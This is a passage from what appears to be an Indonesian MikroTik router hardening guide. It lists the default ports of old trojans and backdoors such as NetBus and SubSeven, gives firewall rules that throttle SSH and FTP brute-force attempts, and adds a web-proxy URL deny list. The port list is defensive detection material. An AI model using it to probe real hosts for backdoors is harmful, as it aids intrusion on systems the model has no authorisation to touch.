Millenium 20000-20001 TCP
MiniCommand 1050 TCP
Mosucker 16484 TCP
Nephron 17777 TCP
Net Administrator 21/555 TCP
Net Controller 123 TCP
Netbios datagram (DoS Attack) 138 TCP
Netbios name (DoS Attack) 137 TCP
Netbios session (DoS Attack) 139 TCP
NetBus 12345-12346 TCP
NetBus Pro 20034 TCP
NetMetropolitan 5031 TCP
NetMonitor 7300-7301/7306-7308 TCP
NetRaider 57341 TCP
NETrojan 1313 TCP
NetSphere 30100-30103 TCP
NetSpy 1024/1033/31338-31339 TCP
NewApt 25 TCP
NoBackO 1200-1201 UDP
One of the Last Trojan (OOTLT) 5011 TCP
OpC BO 1969 TCP
PC Crasher 5637-5638 TCP
Phase Zero 555 TCP
Phineas Phucker 2801 TCP
Pie Bill Gates 12345 TCP
Portal of Doom 3700/9872-9875 TCP
Portal of Doom 10067/10167 UDP
Priority 6969/16969 TCP
Progenic 11223 TCP
ProMail Trojan 25/110 TCP
Prosiak 22222/33333 TCP
Psyber Stream Server 1024/1170/1509/4000 TCP
Rasmin 531/1045 TCP
RAT 1095/1097-1099/2989 TCP
RC 65535 TCP
Rcon 8989 TCP
Remote Grab 7000 TCP
Remote Windows Shutdown 53001 TCP
RingZero 80/3128/8080 TCP
Robo-Hack 5569 TCP
Satanz backDoor 666 TCP
ScheduleAgent 6667 TCP
School Bus 54321 TCP
Schwindler 21554/50766 TCP
Secret Agent 11223 TCP
Secret Service 605/6272 TCP
Senna Spy FTP Server 21/11000/13000 TCP
ServeMe 5555 TCP
ServeU 666 TCP
Shadow Phyre 666 TCP
Shit Heep 6912 TCP
ShockRave 1981 TCP
Shtirlitz 25 TCP
Sivka-Burka 1600 TCP
SK Silencer 1001 TCP
Socket25 30303 TCP
Sockets de Troie 5000-5001/30303/50505 TCP
SoftWAR 1207 TCP
Spirit 2001a 33911 TCP
SpySender 1807 TCP
Stealth 25 TCP
Stealth Spy 555 TCP
Streaming Audio trojan 1170 TCP
Striker 2565 TCP
SubSeven 1243/2773/6711-6713/6776/7000/7215
/27374/27573/54283 TCP
SubSeven Apocalypse 1243 TCP
Syphillis 10086 TCP
Tapiras 25 TCP
TCP Wrappers 421 TCP
TeleCommando 61466 TCP
Terminator 25 TCP
Terror Trojan 3456 TCP
The Invasor 2140/3150 TCP
The Prayer 2716/9999 TCP
The Spy 40412 TCP
The Thing 6000/6400 TCP
The Traitor 65432 TCP
The Traitor 65432 UDP
The Trojan Cow 2001 TCP
The Unexplained 29891 UDP
Tiny Telnet Server 23/34324 TCP
TransScout 1999-2005/9878 TCP
Trinoo 34555/35555 UDP
Truva Atl 23 TCP
Ugly FTP 23456 TCP
Ultor's Trojan 1234 TCP
Vampire 1020 TCP
Vampyre 6669 TCP
Virtual Hacking Machine 4242 TCP
Voice 1024/1170/4000 TCP
Voodoo Doll 1245 TCP
Wack-a-mole 12361-12362 TCP
Web Ex 21/1001 TCP
WhackJob 12631/23456 TCP
WinCrash 21/2583/3024/4092/5714/5741-5742 TCP
WinGate (socks-proxy) 1080 TCP
WinHole 1080/1082 TCP
WinNuke 135/139 TCP
WinPC 25 TCP
WinSatan 999 TCP
WinSpy 25 TCP
X-bill 12345-12346 TCP
Xplorer 2300 TCP
Xtcp 5550 TCP
Xtreme 1090 TCP
YAT 37651


########## Pembatasan Brute Force  #################################
/ ip firewall filter
add chain=input protocol=tcp dst-port=22 connection-limit=1,32 \
  action=add-src-to-address-list address-list=ssh_logins \
  address-list-timeout=2m comment="" disabled=no
add chain=input protocol=tcp dst-port=22 src-address-list=!ssh_logins \
  action=accept comment="" disabled=no
add chain=forward src-address=192.168.1.10 protocol=tcp src-port=21 \
  content="password incorrect" action=add-dst-to-address-list \
  address-list=ftp_logins address-list-timeout=1m comment="" disabled=no
add chain=forward src-address-list=ftp_logins action=drop comment="" disabled=no
########################################################################

Pemblokiran beberapa URL tertentu dapat dilakukan pada mikrotik.
Jika paket web-proxy telah terinstall dan web-proxynya juga telah
dikonfigurasi, maka perintah dibawah ini dapat disertakan.

Update terus URL dibawah ini, sesuai dengan kebutuhan Anda.

### Blok URL Tertentu untuk Web Proxy Access list.
  Cari Sendiri URL yang akan diblok ######

/ip web-proxy access \
add url="ds.eyeblaster.com" action=deny comment="" disabled=no
add url="duolaimi.net" action=deny comment="" disabled=no
add url="dutch-sex.com" action=deny comment="" disabled=no
add url="dvdbank.org" action=deny comment="" disabled=no
add url="eager-sex.com" action=deny comment="" disabled=no
add url="eases.net" action=deny comment="" disabled=no
add url="easyantispy.com" action=deny comment="" disabled=no
add url="easycategories.com" action=deny comment="" disabled=no
add url="easy-search.net" action=deny comment="" disabled=no
add url="ecosrioplatenses.org" action=deny comment="" disabled=no
add url="ecstasyporn.net" action=deny comment="" disabled=no
add url="ehg-bestbuy.hitbox.com" action=deny comment="" disabled=no
add url="ehg-dig.hitbox.com" action=deny comment="" disabled=no
add url="ehg-espn.hitbox.com" action=deny comment="" disabled=no
add url="ehg-intel.hitbox.com" action=deny comment="" disabled=no
add url="ehg-macromedia.hitbox.com" action=deny comment="" disabled=no

################################################################